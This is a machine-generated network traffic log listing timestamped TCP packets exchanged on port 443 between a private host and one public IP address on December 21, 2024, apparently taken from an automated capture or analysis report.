                                                                                                                                            Dec 21, 2024 20:13:51.543487072 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.543524981 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.550889015 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.550904036 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.550966978 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.550973892 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.551008940 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.565978050 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.565992117 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.566063881 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.566071033 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.566106081 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.704130888 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.704145908 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.704212904 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.704240084 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.704278946 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.710954905 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.710968018 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.711018085 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.711023092 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.711055994 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.718341112 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.718352079 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.718401909 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.718408108 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.718444109 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.718456984 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.725756884 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.725769997 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.725820065 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.725825071 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.725909948 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.734229088 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.734240055 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.734297037 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.734302044 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.734333992 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.739670038 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.739681959 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.739732027 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.739737034 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.739770889 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.748728037 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.748742104 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.748807907 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.748815060 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.748877048 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.759831905 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.759845018 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.759896994 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.759902954 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.759958029 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.896395922 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.896414995 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.896483898 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.896498919 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.896541119 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.903357029 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.903372049 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.903431892 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.903443098 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.903482914 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.910861969 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.910876036 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.910918951 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.910923004 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.910953045 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.910972118 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.917418003 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.917432070 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.917490005 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.917493105 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.917530060 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.924736977 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.924751043 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.924823999 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.924829960 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.924868107 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.932221889 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.932236910 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.932291031 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.932295084 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.932333946 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.938815117 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.938827991 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.938885927 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.938890934 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.938931942 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.952137947 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.952151060 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.952233076 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:51.952238083 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:51.952282906 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.089210033 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.089225054 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.089277983 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.089284897 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.089333057 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.095659971 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.095674038 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.095730066 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.095736027 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.095798969 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.102952957 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.102966070 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.103012085 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.103019953 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.103065014 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.110466957 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.110479116 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.110532999 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.110538960 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.110582113 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.117058039 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.117070913 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.117104053 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.117109060 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.117139101 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.117152929 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.124541044 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.124552965 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.124614000 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.124619007 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.124658108 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.131866932 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.131880045 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.131933928 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.131939888 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.131990910 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.144627094 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.144639969 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.144695997 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.144701958 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.144756079 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.281512022 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.281527042 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.281585932 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.281599998 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.281646013 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.288532019 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.288544893 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.288578033 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.288625956 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.288635015 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.288841963 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.295106888 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.295119047 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.295161009 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.295166969 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.295193911 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.295206070 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.302438021 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.302450895 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.302500963 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.302506924 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.302582979 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.310010910 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.310024023 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.310086966 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.310094118 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.310158014 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.316499949 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.316514015 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.316567898 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.316572905 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.316607952 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.322879076 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.322940111 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.322963953 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.323014975 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.323044062 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.323080063 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.329334021 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.329348087 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.329404116 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.329411030 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.329447985 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.443953991 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.443968058 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.444013119 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.444017887 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.444045067 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.444058895 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.479228020 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.479243040 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.479296923 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.479321003 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.479357004 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.486675024 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.486690044 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.486741066 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.486754894 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.486800909 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.493289948 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.493304968 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.493367910 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.493376970 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.493415117 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.499731064 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.499749899 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.499790907 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.499804020 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.499829054 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.499841928 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.506359100 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.506372929 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.506422997 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.506434917 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.506469011 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.512269020 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.512281895 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.512330055 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.512340069 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.512408972 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.518838882 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.518851995 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.518910885 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.518919945 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.518954992 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.636687994 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.636703014 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.636748075 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.636771917 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.636784077 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.636815071 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.672066927 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.672079086 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.672122002 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.672133923 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.672152042 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.672168016 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.677978992 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.677990913 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.678045034 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.678056955 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.678090096 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.683820963 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.683832884 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.683886051 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.683906078 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.683954954 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.690525055 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.690536976 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.690587044 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.690599918 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.690624952 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.690639973 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.697012901 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.697026014 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.697077990 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.697088957 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.697139025 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.702830076 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.702842951 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.702886105 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.702896118 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.702923059 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.702939987 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.709391117 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.709409952 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.709450006 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.709461927 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.709485054 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.709503889 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.830046892 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.830064058 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.830111027 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.830127001 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.830147028 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.830183983 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.864245892 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.864260912 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.864299059 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.864311934 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.864339113 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.864353895 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.870332003 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.870346069 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.870413065 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.870421886 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.870460033 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.876163006 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.876174927 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.876215935 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.876225948 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.876261950 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.882823944 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.882836103 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.882895947 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.882905006 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.882985115 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.889245033 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.889256954 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.889312983 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.889322042 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.889364958 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.895858049 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.895876884 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.895912886 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.895920992 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.895950079 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.895968914 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:52.901746988 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.901760101 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.901812077 CET49737443192.168.2.4172.67.183.27
